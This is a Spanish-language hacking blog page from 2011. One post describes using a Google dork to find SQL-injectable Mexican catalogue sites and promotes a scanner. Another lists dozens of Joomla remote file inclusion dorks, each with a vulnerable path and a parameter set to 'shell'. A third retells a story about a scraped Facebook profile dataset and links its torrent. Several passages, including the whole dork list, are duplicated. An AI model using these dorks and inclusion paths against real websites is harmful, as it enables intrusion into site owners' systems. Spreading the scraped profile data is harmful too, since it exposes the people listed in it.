martes, 28 de junio de 2011
domingo, 19 de junio de 2011
bug en catalogos de mexico
ok hoy navegando por algunas web de mx me encontre con una curiosidad,si bien el dorck catalogo.php?id=
es viejo ya aun el dia de hoy se siguen encontrando webs con este tipo de vulnerabilidad para ello me dirigi a webs de mexico y me encontre que varias web de este pais que usan este sistema tiene este error.
las mayorias de esta web con error fueron creadas por el mismo diseñador y como ya explique tiene ese error en su base algunas explotables otras no solo abria que probar
para realizar una busqueda mas detallada pueden usar el escaner sql del ex team xtremecrip
http://xtremecrip.org/toolsxtreme/index.php
tambien pueden cambiar de variable relacionada a catalogo como lista,ventas,pagos,etc
buena suerte
es viejo ya aun el dia de hoy se siguen encontrando webs con este tipo de vulnerabilidad para ello me dirigi a webs de mexico y me encontre que varias web de este pais que usan este sistema tiene este error.
las mayorias de esta web con error fueron creadas por el mismo diseñador y como ya explique tiene ese error en su base algunas explotables otras no solo abria que probar
para realizar una busqueda mas detallada pueden usar el escaner sql del ex team xtremecrip
http://xtremecrip.org/toolsxtreme/index.php
tambien pueden cambiar de variable relacionada a catalogo como lista,ventas,pagos,etc
buena suerte
jueves, 16 de junio de 2011
dorck joomla bastantes utiles
Rfi Dork Joomla
(1/1)
ESPERO QUE LES SIRVA
inurl:"com_admin"
administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=shell
inurl:index.php?option=com_simpleboard
/components/com_simpleboard/file_upload.php?sbp=shell
inurl:"com_hashcash"
/components/com_hashcash/server.php?mosConfig_absolute_path=shell
inurl:"com_htmlarea3_xtd-c"
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=shell
inurl:"com_sitemap"
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=shell
inurl:"com_performs"
components/com_performs/performs.php?mosConfig_absolute_path=shell
inurl:"com_forum"
/components/com_forum/download.php?phpbb_root_path=
inurl:"com_pccookbook"
components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=shell
inurl:index.php?option=com_extcalendar
/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=shell
inurl:"minibb"
components/minibb/index.php?absolute_path=shell
inurl:"com_smf"
/components/com_smf/smf.php?mosConfig_absolute_path=
/modules/mod_calendar.php?absolute_path=shell
inurl:"com_pollxt"
/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=shell
inurl:"com_loudmounth"
/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=shell
inurl:"com_videodb"
/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=shel l
inurl:index.php?option=com_pcchess
/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=shell
inurl:"com_multibanners"
/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=sh ell
inurl:"com_a6mambohelpdesk"
/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=shel l
inurl:"com_colophon"
/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=shell
inurl:"com_mgm"
administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=shell
inurl:"com_mambatstaff"
/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=shell
inurl:"com_securityimages"
/components/com_securityimages/configinsert.php?mosConfig_absolute_path=shell
/components/com_securityimages/lang.php?mosConfig_absolute_path=shell
inurl:"com_artlinks"
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=shell
inurl:"com_galleria"
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=shell
inurl:"com_akocomment"
/akocomments.php?mosConfig_absolute_path=shell
inurl:"com_cropimage"
administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=shell
inurl:"com_kochsuite"
/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=shell
inurl:"com_comprofiler"
administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=shell
inurl:"com_zoom"
/components/com_zoom/classes/fs_unix.php?mosConfig_absolute_path=shell
/components/com_zoom/includes/database.php?mosConfig_absolute_path=shell
inurl:"com_serverstat"
/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=she ll
inurl:"com_fm"
components/com_fm/fm.install.php?lm_absolute_path=shell
inurl:com_mambelfish
administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=shell
inurl:com_lmo
components/com_lmo/lmo.php?mosConfig_absolute_path=shell
inurl:com_linkdirectory
administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_ path=shell
inurl:com_mtree
components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_pat h=shell
inurl:com_jim
administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=shell
inurl:com_webring
administrator/components/com_webring/admin.webring.docs.php?component_dir=shell
inurl:com_remository
administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=
inurl:com_babackup
administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=shell
inurl:com_lurm_constructor
administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=shell
inurl:com_mambowiki
components/com_mambowiki/ MamboLogin.php?IP=shell
inurl:com_a6mambocredits
administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=shell
inurl:com_phpshop
administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=s hell
inurl:com_cpg
components/com_cpg/cpg.php?mosConfig_absolute_path=shell
inurl:com_moodle
components/com_moodle/moodle.php?mosConfig_absolute_path=shell
inurl:com_extended_registration
components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p ath=shell
inurl:com_mospray
components/com_mospray/scripts/admin.php?basedir=shell
inurl:com_bayesiannaivefilter
/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=shell
inurl:com_uhp
/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=shell
inurl:com_peoplebook
/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=shell
inurl:com_mmp
/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=shell
inurl:com_reporter
/components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=shell
inurl:com_madeira
/components/com_madeira/img.php?url=shell
inurl:com_jd-wiki
/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=shell
inurl:com_bsq_sitestats
/components/com_bsq_sitestats/external/rssfeed.php?baseDir=shell
/com_bsq_sitestats/external/rssfeed.php?baseDir=shell
inurl:"com_admin"
administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=shell
inurl:index.php?option=com_simpleboard
/components/com_simpleboard/file_upload.php?sbp=shell
inurl:"com_hashcash"
/components/com_hashcash/server.php?mosConfig_absolute_path=shell
inurl:"com_htmlarea3_xtd-c"
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=shell
inurl:"com_sitemap"
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=shell
inurl:"com_performs"
components/com_performs/performs.php?mosConfig_absolute_path=shell
inurl:"com_forum"
/components/com_forum/download.php?phpbb_root_path=
inurl:"com_pccookbook"
components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=shell
inurl:index.php?option=com_extcalendar
/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=shell
inurl:"minibb"
components/minibb/index.php?absolute_path=shell
inurl:"com_smf"
/components/com_smf/smf.php?mosConfig_absolute_path=
/modules/mod_calendar.php?absolute_path=shell
inurl:"com_pollxt"
/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=shell
inurl:"com_loudmounth"
/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=shell
inurl:"com_videodb"
/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=shel l
inurl:index.php?option=com_pcchess
/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=shell
inurl:"com_multibanners"
/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=sh ell
inurl:"com_a6mambohelpdesk"
/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=shel l
inurl:"com_colophon"
/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=shell
inurl:"com_mgm"
administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=shell
inurl:"com_mambatstaff"
/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=shell
inurl:"com_securityimages"
/components/com_securityimages/configinsert.php?mosConfig_absolute_path=shell
/components/com_securityimages/lang.php?mosConfig_absolute_path=shell
inurl:"com_artlinks"
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=shell
inurl:"com_galleria"
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=shell
inurl:"com_akocomment"
/akocomments.php?mosConfig_absolute_path=shell
inurl:"com_cropimage"
administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=shell
inurl:"com_kochsuite"
/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=shell
inurl:"com_comprofiler"
administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=shell
inurl:"com_zoom"
/components/com_zoom/classes/fs_unix.php?mosConfig_absolute_path=shell
/components/com_zoom/includes/database.php?mosConfig_absolute_path=shell
inurl:"com_serverstat"
/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=she ll
inurl:"com_fm"
components/com_fm/fm.install.php?lm_absolute_path=shell
inurl:com_mambelfish
administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=shell
inurl:com_lmo
components/com_lmo/lmo.php?mosConfig_absolute_path=shell
inurl:com_linkdirectory
administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_ path=shell
inurl:com_mtree
components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_pat h=shell
inurl:com_jim
administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=shell
inurl:com_webring
administrator/components/com_webring/admin.webring.docs.php?component_dir=shell
inurl:com_remository
administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=
inurl:com_babackup
administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=shell
inurl:com_lurm_constructor
administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=shell
inurl:com_mambowiki
components/com_mambowiki/ MamboLogin.php?IP=shell
inurl:com_a6mambocredits
administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=shell
inurl:com_phpshop
administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=s hell
inurl:com_cpg
components/com_cpg/cpg.php?mosConfig_absolute_path=shell
inurl:com_moodle
components/com_moodle/moodle.php?mosConfig_absolute_path=shell
inurl:com_extended_registration
components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p ath=shell
inurl:com_mospray
components/com_mospray/scripts/admin.php?basedir=shell
inurl:com_bayesiannaivefilter
/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=shell
inurl:com_uhp
/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=shell
inurl:com_peoplebook
/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=shell
inurl:com_mmp
/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=shell
inurl:com_reporter
/components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=shell
inurl:com_madeira
/components/com_madeira/img.php?url=shell
inurl:com_jd-wiki
/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=shell
inurl:com_bsq_sitestats
/components/com_bsq_sitestats/external/rssfeed.php?baseDir=shell
/com_bsq_sitestats/external/rssfeed.php?baseDir=shell
MAS DE 100 MILLONES DE PERFILES DE FACEBOOK
Un investigador de seguridad el miércoles dio a conocer un archivo que contiene los nombres, las direcciones de los perfiles y los números de identificación únicos de más de 100 millones de usuarios de Facebook.
La información fue acorralado a través de una guía pública Facebook pone a disposición de que las listas de usuarios que comparten por lo menos parte de su información de perfil con todo el mundo en Internet. Fue recogido y subido por Ron Bowes, un investigador de seguridad con el cráneo de Seguridad.
Aunque la información en el archivo es libremente accesible en línea a través de motores de búsqueda y directorio propio Facebook, la lista organizada de los nombres y números de identificación en la que podría hacer más fácil para que otros puedan recopilar las direcciones de los usuarios de correo electrónico, ubicación u otros datos que han hecho disponible. El archivo de BitTorrent de 2,8 gigabytes también incluye el código de programación que el Sr. Bowes utiliza para explorar la lista de la guía.
Facebook emitió un comunicado por correo electrónico señalando que la lista de nombres de usuarios, no es una amenaza para aquellos que están cómodos compartiendo público:
Las personas que usan Facebook propietarias de su información y tener el derecho de compartir sólo lo que quieren, con quien quieren y cuando quieren. Nuestra responsabilidad es respetar sus deseos. En este caso, la información que la gente ha acordado hacer pública fue recogido por un solo investigador. Esta información ya existe en Google, Bing, motores de búsqueda, así como en Facebook. No hay datos privados es, o ha sido comprometida. Al igual que en las páginas blancas de la guía telefónica, esta es la información disponible para que las personas puedan encontrar entre sí, que es la razón la gente se une a Facebook. Si alguien no quiere ser encontrado, también ofrecemos una serie de controles para que las personas que no aparezcan en la búsqueda en Facebook, en los motores de búsqueda, o compartir la información con las aplicaciones. Facebook se ha dicho en el pasado que una gran parte de sus usuarios cambiar algunos de sus ajustes de privacidad en el sitio Web. Algunos usuarios prefieren no cambiar su configuración de privacidad y feliz compartir imágenes personales y el contenido con toda la Web. Sin embargo, algunos no cambian su configuración, debido a la falta de comprensión de las opciones disponibles.
El Sr. Bowes, dijo en un blog que decidió compilar la lista de la información del usuario y compartir en línea para demostrar que existe "un problema de privacidad miedo" a jugar con la cuota de manera que la gente la información con el resto de la Web a través de Facebook . No estaba claro cuáles son sus motivos eran para compartir públicamente la lista de la línea.
En el pasado el Sr. Bowes también ha escrito sobre la política de privacidad de Facebook y la facilidad con que los hackers pueden encontrar información personal a través del sitio.
Los usuarios de Facebook que quieren mantener su información fuera de la Internet en general debe ir en la configuración de privacidad de Facebook y el cambio de la ficha "Compartir en Facebook" opciones de "sólo amigos." Aquellos que quieren mantener sus perfiles de ser encontrado en los motores de búsqueda como Google también debe hacer clic en el enlace "Editar la configuración de" enlace abajo a la izquierda y cambiar la configuración de "Público de búsqueda."
la descarga de esta base de datos es un torret el articulo o esto vio la luz a mediados del año pasado pero aun hoy algunos perfiles siguen funcionando
http://www.skullsecurity.org/blogdata/fbdata.torrent
El Sr. Bowes, dijo en un blog que decidió compilar la lista de la información del usuario y compartir en línea para demostrar que existe "un problema de privacidad miedo" a jugar con la cuota de manera que la gente la información con el resto de la Web a través de Facebook . No estaba claro cuáles son sus motivos eran para compartir públicamente la lista de la línea.
En el pasado el Sr. Bowes también ha escrito sobre la política de privacidad de Facebook y la facilidad con que los hackers pueden encontrar información personal a través del sitio.
Los usuarios de Facebook que quieren mantener su información fuera de la Internet en general debe ir en la configuración de privacidad de Facebook y el cambio de la ficha "Compartir en Facebook" opciones de "sólo amigos." Aquellos que quieren mantener sus perfiles de ser encontrado en los motores de búsqueda como Google también debe hacer clic en el enlace "Editar la configuración de" enlace abajo a la izquierda y cambiar la configuración de "Público de búsqueda."
la descarga de esta base de datos es un torret el articulo o esto vio la luz a mediados del año pasado pero aun hoy algunos perfiles siguen funcionando
http://www.skullsecurity.org/blogdata/fbdata.torrent
Suscribirse a:
Comentarios (Atom)